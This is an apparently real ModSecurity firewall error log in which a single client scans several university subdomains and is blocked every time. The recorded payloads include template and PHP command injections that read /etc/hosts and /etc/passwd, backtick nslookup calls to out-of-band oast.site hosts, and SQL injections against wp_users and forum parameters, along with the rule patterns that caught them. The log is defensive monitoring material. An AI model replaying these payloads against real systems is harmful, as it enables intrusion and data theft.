[Tue Aug 29 11:31:59.317566 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10v8Co-f0AAAQMrysAAAAu"]
[Tue Aug 29 11:31:59.318798 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlg4nb1nqsh6i1cc.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAP6NRsAAAAQ"]
[Tue Aug 29 11:31:59.321689 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlg3keb6ufj3i7ua.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAPiBocAAAAB"]
[Tue Aug 29 11:31:59.325432 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlg8m9phmfmhejzb.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAP8G20AAAAV"]
[Tue Aug 29 11:31:59.328924 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlgx9fgnihchycjs.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAN9sRoAAAAJ"]
[Tue Aug 29 11:31:59.344177 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10v8Co-f0AAAQSWP0AAAA0"]
[Tue Aug 29 11:31:59.349233 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10v8Co-f0AAAP5mNcAAAAM"]
[Tue Aug 29 11:31:59.353618 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10v8Co-f0AAAQR4@YAAAAz"]
[Tue Aug 29 11:31:59.394132 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10v8Co-f0AAAQMrywAAAAu"]
[Tue Aug 29 11:32:00.308863 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlg5joa1fn9zzhs1.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10wMCo-f0AAAPDoA8AAAAP"]
[Tue Aug 29 11:32:00.321051 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10wMCo-f0AAAPiBokAAAAB"]
[Tue Aug 29 11:32:01.309728 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10wcCo-f0AAAPDoBYAAAAP"]
[Tue Aug 29 11:32:02.595512 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10wsCo-f0AAAQ7NEwAAAAH"]
[Tue Aug 29 11:32:03.411809 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10w8Co-f0AAAQ9Hz0AAAAK"]
[Tue Aug 29 11:32:04.358786 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10xMCo-f0AAAQOv6MAAAAw"]
[Tue Aug 29 11:32:04.360878 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAP5mNoAAAAM"]
[Tue Aug 29 11:32:04.409529 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAQR4@kAAAAz"]
[Tue Aug 29 11:32:04.415048 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAQUIBEAAAA2"]
[Tue Aug 29 11:32:04.415912 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAPiBpMAAAAB"]
[Tue Aug 29 11:32:04.483970 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAQnF7UAAAAF"]
[Tue Aug 29 11:32:04.494158 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10xMCo-f0AAANsAYAAAAAD"]
[Tue Aug 29 11:32:04.515767 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAQV4SoAAAA3"]
[Tue Aug 29 11:32:05.414712 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10xcCo-f0AAAQ7NF8AAAAH"]
[Tue Aug 29 11:32:05.432789 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xcCo-f0AAAQR4@4AAAAz"]
[Tue Aug 29 11:32:05.435168 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xcCo-f0AAAQ7NGAAAAAH"]
[Tue Aug 29 11:32:05.454258 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xcCo-f0AAAQ7NGEAAAAH"]
[Tue Aug 29 11:32:06.319540 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQMrzcAAAAu"]
[Tue Aug 29 11:32:06.334817 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQR4-IAAAAz"]
[Tue Aug 29 11:32:06.354336 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQR4-MAAAAz"]
[Tue Aug 29 11:32:06.374456 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xsCo-f0AAAPiBpcAAAAB"]
[Tue Aug 29 11:32:06.377238 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag 